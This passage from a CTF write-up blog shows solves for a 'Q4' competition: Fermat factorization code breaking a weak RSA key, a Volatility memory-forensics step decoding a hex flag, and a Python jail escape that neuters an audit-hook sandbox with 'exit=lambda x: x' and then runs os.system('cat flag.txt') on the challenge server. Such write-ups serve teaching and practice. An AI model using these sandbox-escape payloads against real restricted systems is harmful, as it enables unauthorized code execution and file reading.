</span></span><span class="line"><span class="cl"><span class="n">flag</span> <span class="o">=</span> <span class="n">dec</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</span></span></code></pre></div><p>When we executed it, we obtained the flag in plain text.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">$ python3 solve.py 
</span></span><span class="line"><span class="cl">un_sm4ll_crypto_para_preparar_EL_PPROXIMO_Q4
</span></span></code></pre></div><h2 id="minicrypto">miniCrypto</h2>
<p>This challenge was a vulnerable RSA implementation, since the prime number $q$ was generated in an insecure way and this allowed that by means of <em>Fermat Factorization</em> we could factor $n$ and break the whole cryptosystem. This is the implementation of <em>Fermat Factorization</em> in Python.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">isqrt</span><span class="p">(</span><span class="n">n</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">x</span><span class="o">=</span><span class="n">n</span>
</span></span><span class="line"><span class="cl">    <span class="n">y</span><span class="o">=</span><span class="p">(</span><span class="n">x</span><span class="o">+</span><span class="n">n</span><span class="o">//</span><span class="n">x</span><span class="p">)</span><span class="o">//</span><span class="mi">2</span>
</span></span><span class="line"><span class="cl">    <span class="k">while</span><span class="p">(</span><span class="n">y</span><span class="o">&lt;</span><span class="n">x</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="n">x</span><span class="o">=</span><span class="n">y</span>
</span></span><span class="line"><span class="cl">        <span class="n">y</span><span class="o">=</span><span class="p">(</span><span class="n">x</span><span class="o">+</span><span class="n">n</span><span class="o">//</span><span class="n">x</span><span class="p">)</span><span class="o">//</span><span class="mi">2</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">x</span>
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">fermat</span><span class="p">(</span><span class="n">n</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">t0</span><span class="o">=</span><span class="n">isqrt</span><span class="p">(</span><span class="n">n</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span>
</span></span><span class="line"><span class="cl">    <span class="n">counter</span><span class="o">=</span><span class="mi">0</span>
</span></span><span class="line"><span class="cl">    <span class="n">t</span><span class="o">=</span><span class="n">t0</span><span class="o">+</span><span class="n">counter</span>
</span></span><span class="line"><span class="cl">    <span class="n">temp</span><span class="o">=</span><span class="n">isqrt</span><span class="p">((</span><span class="n">t</span><span class="o">*</span><span class="n">t</span><span class="p">)</span><span class="o">-</span><span class="n">n</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">while</span><span class="p">((</span><span class="n">temp</span><span class="o">*</span><span class="n">temp</span><span class="p">)</span><span class="o">!=</span><span class="p">((</span><span class="n">t</span><span class="o">*</span><span class="n">t</span><span class="p">)</span><span class="o">-</span><span class="n">n</span><span class="p">)):</span>
</span></span><span class="line"><span class="cl">        <span class="n">counter</span><span class="o">+=</span><span class="mi">1</span>
</span></span><span class="line"><span class="cl">        <span class="n">t</span><span class="o">=</span><span class="n">t0</span><span class="o">+</span><span class="n">counter</span>
</span></span><span class="line"><span class="cl">        <span class="n">temp</span><span class="o">=</span><span class="n">isqrt</span><span class="p">((</span><span class="n">t</span><span class="o">*</span><span class="n">t</span><span class="p">)</span><span class="o">-</span><span class="n">n</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">s</span><span class="o">=</span><span class="n">temp</span>
</span></span><span class="line"><span class="cl">    <span class="n">p</span><span class="o">=</span><span class="n">t</span><span class="o">+</span><span class="n">s</span>
</span></span><span class="line"><span class="cl">    <span class="n">q</span><span class="o">=</span><span class="n">t</span><span class="o">-</span><span class="n">s</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">p</span><span class="p">,</span><span class="n">q</span>
</span></span></code></pre></div><p>When factoring $n$ it is only necessary to do the typical RSA calculations.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">p</span> <span class="o">=</span> <span class="mi">113297151305912403070580180537218896504689162129151290963870792347548172274828888439339824771092686949516048337709550681895700696862849235103504416930344176272766719097558351724788814246272788549027204516072535618493595756759403872850117463642792662718160145892009731606452724621231186976959981900308189755531</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">q</span> <span class="o">=</span> <span class="mi">113297151305912403070580180537218896504689162129151290963870792347548172274828888439339824771092686949516048337709550681895700696862849235103504416930344176272766719097558351724788814246272788549027204516072535618493595756759403872850117463642792662718160145892009731606452724621231186976959981900308189754997</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">n</span> <span class="o">=</span> <span class="n">p</span> <span class="o">*</span> <span class="n">q</span>
</span></span><span class="line"><span class="cl"><span class="n">e</span> <span class="o">=</span> <span class="mh">0x10001</span>
</span></span><span class="line"><span class="cl"><span class="n">phi</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">q</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">d</span> <span class="o">=</span> <span class="n">inverse</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">phi</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">c</span> <span class="o">=</span> <span class="mi">5335936758885879161423355433081046977912425604704954839255728437814818873543632243485494529752176442064203990160911227421739792500178816177216549939700777698916632547957216674152445717172056741243350986611526570455601290091805437221084166967459773081949268202098903185602329736955728542606518569949940633898118323531851517214467309180041904779619873830149073108642740979827115326295272452191775356208119968967436215978408766348998795622791084227177086770364385580014851638733205723845107102103568366094363255217187381857921576152404851953222136602770299643709048596667087952242391567864632554494747483290981146671513</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">n</span><span class="p">)))</span>
</span></span></code></pre></div><p>Al ejecutarlo obtenemos la flag.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">$ python3 solve2.py 
</span></span><span class="line"><span class="cl">b<span class="s1">&#39;q4{un_p0c0_s0l0_un_p0c0_de_RSA!}&#39;</span>
</span></span></code></pre></div><h1 id="forense">forense</h1>
<h2 id="volando">Volando</h2>
<p>We get a <code>.mem</code> file, using volatily3 we dumpe the processes and we see that there is a string in hexadecimal, we decode it and get the flag.</p>
<pre tabindex="0"><code>$ python vol.py -f ../q4/memdump.mem windows.cmdline

7456    smartscreen.ex  C:\Windows\System32\smartscreen.exe -Embedding
6448    q4_mal.exe      &#34;C:\Users\user01\Desktop\q4_mal.exe&#34;
6452    conhost.exe     ??\C:\Windows\system32\conhost.exe 0x4
4812    71347B616C676F  &#34;C:\Users\user01\Documents\71347B616C676F5F616E616C317331735F703472345F656C5F6D656D64756D707D.exe&#34;

8136    SearchProtocol  &#34;C:\Windows\system32\SearchProtocolHost.exe&#34; Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 &#34;Software\Microsoft\Windows Search&#34; &#34;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)&#34; &#34;C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc&#34; &#34;DownLevelDaemon&#34;
5608    SearchFilterHo  &#34;C:\Windows\system32\SearchFilterHost.exe&#34; 0 828 832 840 8192 836 820
</code></pre><pre tabindex="0"><code>&gt;&gt;&gt; bytes.fromhex(&#34;71347B616C676F5F616E616C317331735F703472345F656C5F6D656D64756D707D&#34;)
b&#39;q4{algo_anal1s1s_p4r4_el_memdump}&#39;
</code></pre><h1 id="jail">jail</h1>
<h2 id="la-cana">La Cana</h2>
<p>We must escape from a Python jail, it gives us the source code and the remote instance to connect to.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="ch">#!/usr/bin/env python3</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">sys</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">check</span><span class="p">(</span><span class="n">n</span><span class="p">,</span> <span class="n">a</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="n">n</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">[</span><span class="s2">&#34;exec&#34;</span><span class="p">,</span> <span class="s2">&#34;compile&#34;</span><span class="p">,</span> <span class="s2">&#34;builtins.input&#34;</span><span class="p">,</span> <span class="s2">&#34;builtins.input/result&#34;</span><span class="p">]:</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;nah! </span><span class="si">{</span><span class="n">n</span><span class="si">}</span><span class="s2"> y </span><span class="si">{</span><span class="n">a</span><span class="si">}</span><span class="s2"> prohibidos!&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Chao no mas!&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">sys</span><span class="o">.</span><span class="n">addaudithook</span><span class="p">(</span><span class="n">check</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">c</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">exec</span><span class="p">(</span><span class="n">c</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Error!&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</span></span></code></pre></div><p>The source code looked familiar to me since I had solved a similar challenge in ImaginaryCTF some time ago, but the strange thing is that the payload didn&rsquo;t work because the <code>exit()</code> function of Python gave me an error, looking for it I found this <a href="https://spclr.ch/imaginaryctf-round-11-writeup">https://spclr.ch/imaginaryctf-round-11-writeup</a> and I could solve the challenge.</p>
<pre tabindex="0"><code>nc 0.cloud.chals.io 32199
&gt; exit=lambda x: x
&gt; import os
&gt; os.system(&#34;cat flag.txt&#34;)
q4{3scape_de_la_carcel_de_la_vibor4}
nah! os.system y (b&#39;cat flag.txt&#39;,) prohibidos!
Chao no mas!
</code></pre><p>In closing, I want to emphasize that the CTF challenges were excellent and I really enjoyed the experience. I am very satisfied with the level of difficulty and the quality of the challenges. I am certainly looking forward to the next Q4 in March.</p>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://github.com/abund4nt" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2024 .
        
    </small>
</footer>







    
    <script src="https://abund4nt.github.io/js/main.min.4ee188e1744c19816e95a540b2650ed9f033ea0371e74eac8e717355cfca8741.js" integrity="sha256-TuGI4XRMGYFulaVAsmUO2fAz6gNx506sjnFzVc/Kh0E="></script>

    

</body>
</html>
